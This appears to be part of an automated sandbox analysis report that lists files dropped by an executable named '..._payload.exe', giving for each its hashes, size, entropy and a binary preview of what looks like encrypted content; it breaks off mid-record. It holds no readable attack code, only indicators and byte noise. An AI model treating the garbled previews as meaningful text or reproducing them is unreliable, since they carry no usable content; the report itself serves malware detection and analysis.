                                                                                                Preview:<?xml.$...0hB9m./j..e.$^..]..X........%=_;..3...}......~..V....8.uCS...S....)...(b.!t.h...P....`T....zd.....i.r.(..}{.W;C".HRR[......#.:En...]..........V.,.O;......?..?.....$.V..*.Rt'B.l..........z.V...L..w..l..._.c$3=.G9.....L...E.]...V.c.}...-<'..Z...wJg....|.[^.}.V...<_...C.1....y.^.......M.W..4Q.s...Ih.....l.X.&M..[.....vzn~..;..'J.aiX/N...C..De.Y..xu.....E?;E%.=...KY .W................gR&....4.............K.....Xdu.....|N..I.mc()..?i.<...p.V>4h\I{M<)...U...D......_....%....:..f\......['...+I....w....Rs.y.......Kx..S.c..2...%\(W.....S.G...p<@...\T.4O...z.".........].."k.TK.6...6.97.C.*.#u$..7.].R)`|......'K.Gw..N....Q.:.>..m.......V.n..C>.BN3..:.U.........I....ZM9.....=...Q...-...qagI)..z...>..&'.....W2.....V..wC...t..@.;....3.I.a."l.}....;o.Z.|U .k...O.\y..V..F..9.Qq......{c.|.;<....2..$w...+>> .k..$...6.v.>.U.J.=.Q.'7.B.a......Z.....3..e..C8.=F.qm.Dl.2.......Q..T.I1......MFh..".gc......Fj+..l....z .3R8BID..r*n.n.^?d.<..2.../..e!f~...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):11063
                                                                                                Entropy (8bit):7.984725628071593
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Hm1lS3zw1updOPuMzDYpkFsi/Ld0F3LGmbEe4Ko9QoNQ/SkypaExRiHTGn:G1lf8pdOPuMzGed/LaAmbEFK+jNQKE+9
                                                                                                MD5:5406C22390B060038F068BFF6E2926BB
                                                                                                SHA1:1F8BBF9715122147855457F700E7AA131E92A0D5
                                                                                                SHA-256:209CA1D4E0BC901EDDC0539FA5D9D2D653BD7E7302D19E914FB66D4A952FACCD
                                                                                                SHA-512:E88F6DCB609D9C2FF28D92D4EE6A05DE6C6FFFE193E1192FF58C96070163A7C7019A099CD68C35B95F5F823663357E5E37A63B0D276176B602CEC3C969CAAA50
                                                                                                Malicious:false
                                                                                                Preview:<?xml.p..EGr.W..zM!].%q.N.E%...7..q......"x...~G752.N...o5.f.l.Z..D.w..E......~..+*~j....*.}O.p..Ru..Q.L.G.#..K..........z.)Q..V$#>o.s.n..:.;..dHk.....Q.].v.7L..=......6.:........[1yF.2j.Wzs....T.....7...WM.5.bWx.3p...]:.t.h...#O.....pF.,.....R.(8..L...].5........*......n!.9Dv.W$.q\|ms..x...u..&.<...-d;..5`.I..A..YE..l.\.....|.....K.aE...U........c.....?..."<.0.....1,......1....Z..lo`.ck......Qv..dK+3.e"q..Ao.z....%...r.;.A..*].....g.BF0_.H..R....E...P.:...^..z.T.*......(j.....e.x`...G.@...gr.@..y..q.....`w....].8..X{.?... N..t...(..o...._.......a..r\..&...=..{.:.[>..^yn...i..?.o..i2... ..e].:../i...4n..y#.%..A.....a.i]. q..U....w-.e..U.........G....]Y.a....o..x...>X"d.A..l..D.....bY..n.....H,...g.....{xL. .....e.B>$y2q{R.^.,Y'.<qXf~....i...-..U.<......g<...U.j..d..*P...F........{.......O....T!..4.j....O...{.....9..<,A....!.\....M....B.U....,'.Ib,`.t..TU..c.w.!}.....;.S..._.!'5.eP..D.zJRp.eUb.(."+:....9..7._...;.z..O.n.t..V..L.:.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):807
                                                                                                Entropy (8bit):7.710826756899404
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:EVVHfj503yusoSwW8yaAwLeffYyxjx3bD:AfQ7PX/ya69LD
                                                                                                MD5:9D344F10B64F6F21288D5D21E0513243
                                                                                                SHA1:1C6A7D023920B4B2DE89A6B28E726D1D6F672F3E
                                                                                                SHA-256:0039C4F3C563F6B016557617789F4ADF022105DF9A2C525A703CC4387940D607
                                                                                                SHA-512:FEF195889E287E8271211B27826665665CBCAA87E3D4621192A0549A060ABF00AE68A8843C9C9FBF1952AA1F94F496424D4E0496489141CC7F1A7D642D88C226
                                                                                                Malicious:false
                                                                                                Preview:<?xml...K..K..bgP......J...b....A.l`Tjf>...;..@....D.d.7D..:...G........m.?.....&.T......2mT.N..l.....*YA..o.!.._..^R..D...Ko..x,N..+@..S..u...=....[.h......-....&@.<x..4h.w..yQ..........AI.t.B...>.G ......j..).S.-\.-.e.Wg'r6s.|......j..........Y....=.4.7.j.8....... .s.Y.H...'|....p>.#r.....RY.8>c.T8.W.Bz.....-\.4..9.E.V..M....H.....f....ej.a...>..x5...O....`.O...y..0....TD...b..UF.6.m.U...56Xx.B..R....a......#...K..^..b.Ofos.d.*<...t.......r.U|.FOm.#W1p.h|.C.b..@..SE{w.w.N..b}..Q.7>.$...(....:.rCi9.8.<.=..!.C..R..J6]...x...a....k..*..=...0.D@....z....A~8..t...`...>..W..VU].3g../H.......5o..R.>il......lf.T..8..T...O.G.'.......K}.+)..1X\....Z.;..yg.T..m.......x,.Yf.+...awL.|L...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):747
                                                                                                Entropy (8bit):7.706459102412388
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:GWd27LmPuG18CUk4V9iUFa6rQ0gfBBfzwYVr3m7zaP14HQWa6l8CgJc3cii9a:5dy4uG6Xkoo670BB7wYV7DmrN8Cx3bD
                                                                                                MD5:6DAAE1FA85CE150497371E6DEA32D066
                                                                                                SHA1:7DC7ED847AC0491A4A480F728FABF095F20E908C
                                                                                                SHA-256:DCCF2940A32C53B0BC34627BC68336EDB22C88E4EBFCC4DAA22A4C959D8E0E83
                                                                                                SHA-512:7183751F6B546D48885251DD0235D65EB85CEF2984429CB6046690D2EBB82247C4516DFB6452DDE940C5F27085EE37266928B56B9FC147C7274E8A5E644C7BFB
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....k.R...9.K.p..n.....R..hSdx...==S..6....a_,k...$`.]...F.&...8Y...g8&..b.....ln.......*...\i3.......^Z.6.S....V ....K.y..E.......|W./...s.q..7..B..e..)..d#.J.c../. ....v6.........+.......$.&...!({.Z....jLb.;.N 9|.k#.w.i."...8...`ZJ.A.....\.B1pa.E-.6. ....X....U.~#]......|>p......z.",.(.p.Q.......<q..G..U.....c%...Q...........\Q.2x...T.d.1.-.Nj.=..vJ..Y..G...'.uC......e.52(...vKo..j...(....#i.k.P.+yAn~.(T.^{...a...Q.Y.B...21.....p...p..`....-,.x>g.d../ .|..q..y.;UN.b.NHz..2..Cl@.Y)#q<;..Z..<R+Um..|...{....5.q.,.o.t...G...n..\..P.(.....2.oTy.~.n%z.=7...}.../..{.....h.*...B..fW..z.G.....z.......}.F.....)./....OdX..9N..5....(>.;m...~.B..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1786
                                                                                                Entropy (8bit):7.8922572849337875
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:P2r1o9DH6p/2z6E+UwkKbF7EnWFmYHxGGMePqU0+PLD:lDH6p/heqEWFtsGMJU0+P
                                                                                                MD5:4A2291E3ADBE2CB9BF7C17D1124A261D
                                                                                                SHA1:48BF6803E9513A5AFA8E08C19399BF0BA600B105
                                                                                                SHA-256:E8C0C39BAA881CAC3A802739F5F9C824CF2E9F7972035AB5E344172CACE50BF1
                                                                                                SHA-512:B4248A08BD3A17C70317A3C390B95673C5837BF0C3F95CFA5060D84BCD93607B82A11618F4B1B038E8061FBD2AAE446DC20547408E6CC0FAB1AC3D8A5D60A035
                                                                                                Malicious:false
                                                                                                Preview:<?xml.c0....%z.....,Xc..{.f.F.2.>..*+P..b.Ax.......$.E..&..i.....-....h8..)..D>.Tl..L}.lJ...M.....:.....b5P.2..XC.<\.?.=..$.M.9...B.:.....=.K;4g.<..1.GG...R.B....Q...*.....q.....c....1.......B9}0.N...T.|...'.X..Mxx.=..........!.....s.\L..l......Z......f.........M..:.....(.>H...O..`<...*3.~^D..yg...S(...g\..^29..2...pz...Z.k....W~..;.<..T...,-|..2q.F..p......X...Z.f.U.[..%w..,..O..+8......#t__..;u.^.u+S.)h..BZ.=.*..2rH......":...~kt.'.h6"M...V...I.t..^.........r3.Kj.V........K..^{..N7u. .Z|....0.1....}.h.{.4.....m.i^|K.....}....a.z........S@.x..R.r....O.r...Xfi.ql.g.N....a(.$.6.*..:N}..a..Y..yM.................TA...T{.O....7..B"...|N.n..>..F..C+S.....5m.].,P.S........^.XK...`Q."....=R.q(.=.....}.8.*.........b ....N.}..}.j.-.9.L@.....<.^g. ....!..]....z....w/(.9..K.6./.I."e..c.4.|.e.... ?..G.(v..++`.V..<}....gG_>a ..\.....~P...~p..V..=...oc..Z.}e...?0......+....VB..}..].o....!<.w.(...d.].5|*.C...x..:]..N#." .t..J,...4..|...c...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):886
                                                                                                Entropy (8bit):7.763629300326257
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XxfUMx2FQdnjIjY3QI4luj3TjPEmfLx3bD:XxiF0njIk3yl+PcmfVLD
                                                                                                MD5:76A5F16A3697201AFBF830FA940CACDA
                                                                                                SHA1:61655EF9967906D8037C27407E0AA2D60039E5FA
                                                                                                SHA-256:5E85D2C33B291E379FBAC5947B804D4420991516E305CAE27ACE2AD9597AE7DF
                                                                                                SHA-512:9CD8F25A4E5A5C30B706235C392B650E753C4DBE2A506831D90505360FB7688AABE57020914C673A792C78CDB1112D573F49C1321E755C0E2139ADD71A779713
                                                                                                Malicious:false
                                                                                                Preview:<?xmlJo.x..k..-.8.)0.X.b(^"U.Xw....V...h0..3....Q.q...H..Kv.E..9..VCC.~.L.F..>...IJ8@mA.....P..F$....A..{u...j...^7.?..b..v.m8..;zu.B.B.F.$...p.....z.P#..v..M.6..A.(}..|d...&}u........e..... ..9......Q.....eh;._.{u..a7Q....wd.N"..}4..&..A.2.>d..R7.4QzF..IR..D....`.q.R.2.H4?.......Yp.0..u.~.t.....E........2i..TSl>....v.......-..7.M..eG..>..L..@..wr..;...w./7...@D...\[sc|....{..../....FI~X.<$.[..,..}....y....D......R.....3A......LV.F<mQ...B.P.b...r...([...#jmj.Z.9....].E X....i.....i.T.=...../ ~.....ke..D....*....l.!. .g;.+....{.[P..........t+.O.k..{..'..!Z..R.#.:.2.:.h.....Z...T..Q9....]J[.......'.;71..|......r.....u..zi>....O.ey..~... ...D..Mi..N....._M..<..O.Y|.Q.@..?8...N..g0z..(Ur..}o.#.T..d(...'...{..I..F59.,.0.OAI..N..0..m..qz.....2..;....i|...op.w..<...yC=d..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1324
                                                                                                Entropy (8bit):7.839231414149389
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cfUUwxdYaIRX92oXRpbm1wNFU/fEiAVZS1on/4Ox3bD:cfUUadLIRN2oXRpbm1wfEfENiM/RLD
                                                                                                MD5:61C412956F76273B136D0472C869DE59
                                                                                                SHA1:002EE6E90EF3B8D3C3F42A296ED853CA72657B93
                                                                                                SHA-256:3590DB544C05FA3ADB8EA7C3CD0628E0670D334090B38D95CA821934086EEE23
                                                                                                SHA-512:94C9D110C5C7433A4F63CE7CDEA0D4D8CC842E581647A9230F877C839CB2FCB2859E1B0EF51EC40DE37FB707799B8187665082E95F31C35F570FEC8B1FF97768
                                                                                                Malicious:false
                                                                                                Preview:<?xmlL;.....s.A.b..p..-P..\pz..@.l.{C?p'....Eg/...........K.9SWn..RY?% .&._.d..I8...f6...p....$....a].a1..?..h(..^.@....u-v......=.o..6.&...-@....A.{S..../..C....d..@..B`...a....h..K...y.3S...c...z.@|.9<P4.....>.O....}.....$..J..U.[...........H....-........I...B....,.U.v...p.j.[..z.F;y.gk.....#..$k....'iL.#....0.Kf....)~~...._..&....eR........1....y...dz....'..oQQ.I...{O....m.<!.-.8.;...D..<.7..].FF.<..k3....(...;.];....P.m^T....G...*...Y... .fN....t.+.V..,.v/).c...g..\v].d.H..8}.(.];......\.!g0..~....C.vYaH.q.H..2.sg.._...r.....5....H.......qL=b:.]..6..px..>P3%l.....b6C.B..e.0Mtk6.O..*.C.......s...'q..tsL.4....K.&.d.. r"..|.`2.v.G.o.u.#(b...J..D.......SM)i..Z`...;.>..)}..E.m)..e.E.W...;.. .....r'~.r.+.s......T..qP..e:..1.i/m..3`....K.V..1.Bp.....gw..+..|.';J..QT.f..=.N..?.%S..g.Pv..s;...4...jbK.%.5..<Iv;6..Y]....@.h..E.?..;.d....:...._....T..oZl]..N..n..e..:.'.-F+...HgfvW;..7#*n....x.'..6%kl...'.s..,.+E....../..........)A.h}..}.9......}.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1435
                                                                                                Entropy (8bit):7.862975103356705
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:EczCT60ewnB2gSCcnWLp1DWy+69MlYJ1PP9k/tpUuXarMz+tYj5x3bD:EPrhqWLbWv6ao9kl5z+u/LD
                                                                                                MD5:4DD5A9F08919F80E600E583E9EAE0D45
                                                                                                SHA1:7FE26EDC7677F101007A9D3DA6ECF13DE604F874
                                                                                                SHA-256:462F7CFF2D833C3A475F98CF2847730703F9338414CE05FEE7315BEF76F1E227
                                                                                                SHA-512:61C76341631EA4C3613EDD58660685D46B6BDE34C8AC9E1AEC29D99FED3624ED45BD9FE244C71D8610ADBF726019F07D0A341D17383D728957B98CE65021575A
                                                                                                Malicious:false
                                                                                                Preview:<?xml.H........]......E..._]~....W..p:..r.V.f.].9..&...!....:....C[...pc...[..R.35D.A%.9..............?.j.|6.u.L..$?.*..":.6.8...o....n..M".O....j...K]R..f.....;..."D4z.......`.y.o...;....Y..%.....Z...yI../)..T5.4"/.K..U.../....jkAyf....-..Rc&............A_.....0.SH..U..iG.{..`..K..4..>.j./s..S.....]...h....n.*.X?h.......0?..1BR.5]..WT.*.b;...I..(J..S)l....>..pQ.zNd .....a...xt5.....7...II...i...e...S.z2*B.&..i's...#A...u......e#:l...:.JA.xH.n.....t....Oxp.r.k...ovk.p>.n[.%m.xl...K.?c7B.Q.-f...:.....*......H..=..y#..D.<..K..j.../..."M2.....".|..X..,1..!gYa.!..LL....S.i+.W...B..O_7.^.$...p.A...61|s.XWX=.......fK../.CO..0.^.2.|Rp.s..Q.\.{....i.M5./...aT.*../...Z..p..C....VQd,'5;.....8QY:....#F-......e.qI...'..D.>....@EV..z....[.H..7Z'..._.../(v.*..G.3..M!.....?]..G..x&"=&.Md....cL..R?..Hu.....i.".-.j..G. .....O....,.yx..f.".0.....k.H.X.Ly.~+.n@..d.<....$..u.$.9..U%.M..eT.. .t.+H.....F...\..j|....$.".q$...(../).k.o.R.Olc.g.....|U.,..Mm.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7119
                                                                                                Entropy (8bit):7.9743970446358095
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:nWasHCySIJgKVkd0wMEISmvI/1m743+bI4L3fF4bE/:nWasfTvadxAakLvqbq
                                                                                                MD5:AD39F43F561EEFE62E72A42949122B4A
                                                                                                SHA1:B00756314E24061C7AAE1D11C511687F614FD872
                                                                                                SHA-256:A5375486A56B3BE751AAE7676437297CCAC3B91752085DBD47448CCB8A2FD4CB
                                                                                                SHA-512:96E8210E6698C16F9520F7CEEE4DDC10C28E058E7DC7DF23BB2A932D61324F45B094686F2D4E7BCD3A54D65271C182C191F50811572C236A8D6D53F3834A6401
                                                                                                Malicious:false
                                                                                                Preview:<?xmlT^M.1a+.....w.y.JE......(.Ak..@... O.|....Z/....V|...Z...KQ..c&.....E...-.S..O..eQ.....3|.>6..........$.#........S._.s.(.....c.k..T..j.W.................pE3o....T..a.&{..K.fP....N8.ex.j.?.].....:........O...l..a.Q.?..bd..g(..:e...zJ4U.........g.................2.....K5....h..o.<Z.?T..X.{.._.$.p#Qh..W`...!9....Ac.e......3.../..."~...,......R...3...u..7.d.....u.S...x..J..5.......[^.hP.....9.i..;.Z...d:....C........l..{..c. e>..d.e~J.j....K..fW$.;...u4.K..Li.$..$...'....o..c..$VK...R...s.,.....;.........9#.n.....F...5...S.C.._..ota=.>...}.KU.N].......u...oS.n...lRj\h..^.\.:x..........[P...`..hY.b.WE./$<....!.gn..e..T...u|-..}.&A..\.....b.w`.1...I......(...^G.ieQ.\.:(..v/#.p$E..... .m.A....3_O.....M{i..v..ZYEV.0$B..i.h.].....g(SS.<....=......tmk."..P.i.......qh.-.p..].n.3..@.%.....vQ....HQ...{<..iN..&..KCUu..O...k..@#.Y../}h..n^.0"..N9W,...]L.ZG..R...=i<.N"....Q<.V-....;.d...D..;I. >W~.nyl./......a....0....|...]u.\M`...E..H.....* ..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):762
                                                                                                Entropy (8bit):7.692364535022483
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:N7dqBWs1lWZsb5zYcakHbiqFbgxSNrdVmgqR3n5yfKe/9TMVfmv7SgJc3cii9a:tdq51llYc3HX/B/cR56Ke/tM8vOx3bD
                                                                                                MD5:D20C78435BB370AD583FCFBD42DB06A5
                                                                                                SHA1:B625D98DE2131B838D7C8C0E84E0332D66CAE213
                                                                                                SHA-256:FC190A84A7EE44D244251D13F34772D32861C4A84240A3AD71DAF6E3C4457052
                                                                                                SHA-512:655332F64DEB99EAAF8DC8036980370A6DD15B090A3B988501F80991E7FEB832C31DCF8D5B319D6CB73B310B10D11FF1A69DA45681319C6B854FFFF291B00843
                                                                                                Malicious:false
                                                                                                Preview:<?xmlH..D..*....^...N....F,.m.tA(=.Tl..q....F..+....W.....(<.l.9.$...a.3.H7.."D.&.....Ff.yY.*}.,...........?..;.sAP.S..Ast........."..).Ws....o4.S...na..2.6...@.....Fa..s....;.]...:..\...F..[.....~4../.r..%......y.._:@.J.\..x.x...aw..Y............./A..+A.....h.c.HO.+..{;`a...- q.'b.}_...>... .....{D8..4.h.0..5RS..M>.V.=.*|.7.7P...x..G.l...Rx.).......;a!...>.(.1[..8.8...._.A%.a.(.hd...*~A.HC.D...`.(../.I... SV....'.<..os.'}.....G..h..j,s>......(.......zc.'n.X..4.;.Fs.#....-..H.[.........}..(t.\/....T.;.[o..:r..~...v..>~Qo...Jh.B..`g...\.-..&.)+ f.J..Se...<\....}.7<...L......B...x...s.]..3(y..O.L....0..E.h9{..].{..?..G^g.v.Rn.....e.`G'gj...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1463
                                                                                                Entropy (8bit):7.866911840226521
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:d/6KILyWqJqJNZQCt3Nl4Jk5bmYr6jsflOobYNH/jvO/s7ZaicK2Zv5x3bD:h61LaCNGCLek5l6gfcob2H//7Z5r2Zbn
                                                                                                MD5:CF6E1720B42F398DEC8E9B891EBD84F2
                                                                                                SHA1:EA9E6297833A7A5D7CFC27982F36627CC57089F4
                                                                                                SHA-256:567848E499479E3826609A43942B5CB62A782658885998EEB2012A8933F76D2A
                                                                                                SHA-512:9DC9AD98FEEB397A6BDFE715BA4590E0DB648021ADC7A6A59F4D5997D6AB27870156DA852F908DC8C9A9379B3F0B19C3E82D27FE93B575B648D4374DE47AB89C
                                                                                                Malicious:false
                                                                                                Preview:<?xmlo.`..........p...d..32.p....|.@......I..qc.wu..h...#..Vu.@.2.8..?;...90&.;X....9..j*...A.'.!.I.+:.........Gb.hY.M.k.6...W..>.e:.......k.Pq;.wC.............*....PGP.U...%E..+..=..V.A/.?y.y.#.1..dO..u.:.<...........f.`.y...D....!G:...W...L:d..!.6{.....(M .$..3.f...1.L..{.....c.........J.r./.^...D_...gpW.H..~...5P.....K..4...;g.mw.].$f.......H...".lt......t...[.'.......[..tg........4z.L/2.....5^v..........1.....30.`T.|...M......V.+.Ip.....(.b...e....Y.|.(.......H+m...H.2.....J.~m.)y..............[.h.....5.,.Z;/.l..}......x.i-...c.vW4.~.....z...,.f.;.r.c...7.=.....iZ..2./p..z.5q('$..R:...4%54t.Q...."tm.v..'.Vo...MR.4.}.4.....M.'k..ng.....5.P?6oJ.....)q(.+.i..%...fFe.....t.Wj..-.b3.......[.5i.4..9...#.?.......}.a)....S.U..oK..$..&.c....\..B...M...*.;.f..&.1....8..<..P.....=..rN!..!+.PXX#B.W...z..J.._..&J..4..,~.......N..|4.2;...........l[../.MNQ..W...`.....r......G"E|......)sR...3.s.<...bus;.t..p...hP...#*y.|......Ib.lH.[6.+.r.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3505
                                                                                                Entropy (8bit):7.943456281996044
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:661CIJgLR4lgqKYzEbzZL0MhLIHMaey9Nnj7nAUf8Y5PPlbpW3QSLeCZRuME6zFX:661GLR7gz4VdQ731pW3DZRM655Q0jr
                                                                                                MD5:66152DEFF1675EBBC78A303F1F5D0E3C
                                                                                                SHA1:5FFEC11ECEBD73554598D179ECA9A84A2E059A2E
                                                                                                SHA-256:28DBB573C3F4391E00A6A5D74B65B6236D722B28AF7EC06E6A820426B8B0520D
                                                                                                SHA-512:6720625FEACC284EB83D8C8D9070DA6B53520FAD9FDAF8148EF5AC021CDB1D1B9B886F83A012E5D6B68D4E832AF31FFC9D4983AC16E1B9DD22B860DEFBA2BCD4
                                                                                                Malicious:false
                                                                                                Preview:<?xml.\.~s..,.....AeW...J.8d............mO..a.I..Tj,.n....,.:.n....E.}.X..Y....R..;..(...|fV..a\(.Y...Y8..1..V.H.....0...`.`.J..}.L...%x|.V..LB....$..$c......Co.....O...-.uW......n..I.k.U...e.l2O.... .e.%+....\...t.....[.wj.N.K..ggt...p..-... ...u....T..xaEQ...D(C~...A.}.^.....N......`i.?T.y$x..o...C....w.]..b.......^.?....#.:....}Z...O.v.<...f..9.-.P*.%.......k<......W.\^.\C..X.?N...U....4&p.]m<.#.W........&.r...O.f$q...\...f...k*...C.8.-.vi..D+...Y.|....;..|..+.J.6-.b)....B.8.B(.O*.....|(M...r.n.....a.D.tcwZ.eh2.<;..aXYQS.....A.'.....W......v......t...vb..~.,...3....U.D..._,?....~.+o.E..:.)...3C.C.E..~.])H....~........n.tf..jE.....[...;....|W...\BpS981.k?u.v...@.?..Inz|..=P.4./...A.KS.'.$-f.YW...y.....HSd....6.6[K..W...m.....Rn..!T...._...'Ez..e.i.fI...&.A.s)];.d...<.w'AH.:.[}.;.:o..aX..K."....D.T6.ei^.r..:;u..>.....-G.....g.p....h,...7.W....<.._f..)....`..Pn.^lK.Wd.......;..Y.......N3...*1............z7.AN...u......Z.$!>%5...=.N...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):965
                                                                                                Entropy (8bit):7.773523858974913
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YSwVW6cm++1P1ZCVRxDguytc8LjQIiiPaPZx5hsKn1x3bD:YSUGUZC9WjLrlqOiLD
                                                                                                MD5:9D460F85A93356709917E2B0D3B07152
                                                                                                SHA1:EC910CB372D5E9160CC70E467BCE1E939E5A0F4F
                                                                                                SHA-256:3E7B2D446D1E5687BFAB8BDC80CD20C2B88FE1B47A449211EAADA547698F62DA
                                                                                                SHA-512:CAB369E6169B439EDABFF657D3F4BAFCA656CF15E29C692C80DC29829F003490B541ED82E2B89E2E57DDBA1898A264B62BB8092AD3323170EAAE5AA998770CFD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....5[&^.c.mn......pa.z,.:...sR@X.......;...~n..b...j...Y-.-&..Z....[.f.:......Yz.....H7.|R63......C.~}.=....).T.5.a..(@V...G\.....{e.Q...|L...,o...+P....N#3...\!..Fc..........e....{Y..{....a.H.v.Y7(......=..1W..$..Z.y.ve.........-..|J.....v6s.VdU....".h....V....>.}.. L..H..o&..B.`...|........g1.`3.....Z,...4.H..aUNS.w..Y..jx.Hw....<i..A..Tzg"T_5.T.^%....}..A.O.@/.........2...4.Q.....E.U.qM.e.E..qi..~....#.>...z.$.C..#/..0....(S.wL{.e.u.E.s}...~.*._..Pu'&..8.#.dY5...."...:.{....5....{...=..Z.3k.C.....}..|.iN`.Y.4.......z$...8....K..-.....3....c..B#L2...].'.8.6..2[...[ ....n..u|..B..t....v5...2..I.........h.+F}..*...H..o..-...f.o/..y._.f:..}...1..t.dnP.C....7^.....-.G....:C.!9Q.....v.G.) .j<....e.........&=.%....I m.I..j&..@..3.#.v'Q.....(.c.]n@...@.s.DB......$..`..1.y....^.;.-..s6.F.8....'.iW..u.A.....6y3.8.7.=eV1..6BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2983
                                                                                                Entropy (8bit):7.928122629665204
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:tGtK4gB+4pIg3V2QCjXv8e+h1kNw9rf2/O/xR3Ln3NnrXFoiMxVxsubiLD:qKrBGg37te+h1Y6f2qX3zNnjOiox5i
                                                                                                MD5:AB19BB138FD79685234C60C58B8C02C4
                                                                                                SHA1:E9B3592437C37447B903A8CCBAF894B5FA570FE2
                                                                                                SHA-256:35224AA9A4253FB5BE3B1B7B3055FE16A7AD8291E3188EED47FABE8C4C447FD8
                                                                                                SHA-512:7A02F9CBC743FC5828ED0898A5C5C9B46BDF575C954BC1742589F4B5FB3BFEA21877826ABF9AADE197643E95473CD338F6D2FAD36EE4FAEC76A4C6F0BA4EE958
                                                                                                Malicious:false
                                                                                                Preview:<?xmluZM...LwI..4.U...P.1..Q.)..t,M......N.MY.u.C...kR..;2..]D.r.p.T..."R.....kh.H.l..........s$g.....@z(...M...t x~...A....F..LC.P@.c8....HP.#.9..v...6Y..o....e..&.....T/...........Q.......g.`]!..j.$.2*.m.....,}..@&6!j..9A.u...IY........Pq]..^..A...#.C.P..]..#1...,....c.B..};...-Z........-T.A...`o.:]A@N.A9..V.......4..W{hI*.C....u.30|6...[...X?;.....V................X{...._10.......&7 $i.....W......a..~.'..*...k.......K....0I..^{......IOT.....5.ed.6.....u..........{.:.J,.o...P.T:.r.gQ..5.....Y3......VA....>....u.Y..j.f....9}..c.Jk.r`f+:].......5.*$.~wJv]..g..y..)....>*...,......f....x..fi..g..C...L.5Yv..h...b.{..p.0.O..UZ.s........UQ..'..)..B...B|e..g.M..4.x.......Y.#...Y$W[>hH?.....lS.b.?.,...YT...2.\....3.K....CVs.......i.x..-...D.<WoM.#.....P.$..4?..G...h3..`..JKR......?v.....x%....+...?.M....C......7T...Sp.Zt.....#,w.........(........ZP?.F.......XV,...|..+.e~..g..)..[.sw~.n..ub.p....J....6h.;.>0..s_.f.....N6.N.bG.?....[..c
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2487
                                                                                                Entropy (8bit):7.921042237402851
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:a3NN28F3X5Ocila3NHAiEcVczXQMJxuD4SHEk51qfL7HsFmb+LD:CkS5Jila3xscKAsG1UL7HsFl
                                                                                                MD5:1A507DD68B9CE316BA0C91264ECD5257
                                                                                                SHA1:01FD5BACAC7DD3D5899EE81464AB12FF7B0B055B
                                                                                                SHA-256:7C3FF91DE7194078CEC6B358F75518F2E5EAE72A3296EEA0721A17AD427658C1
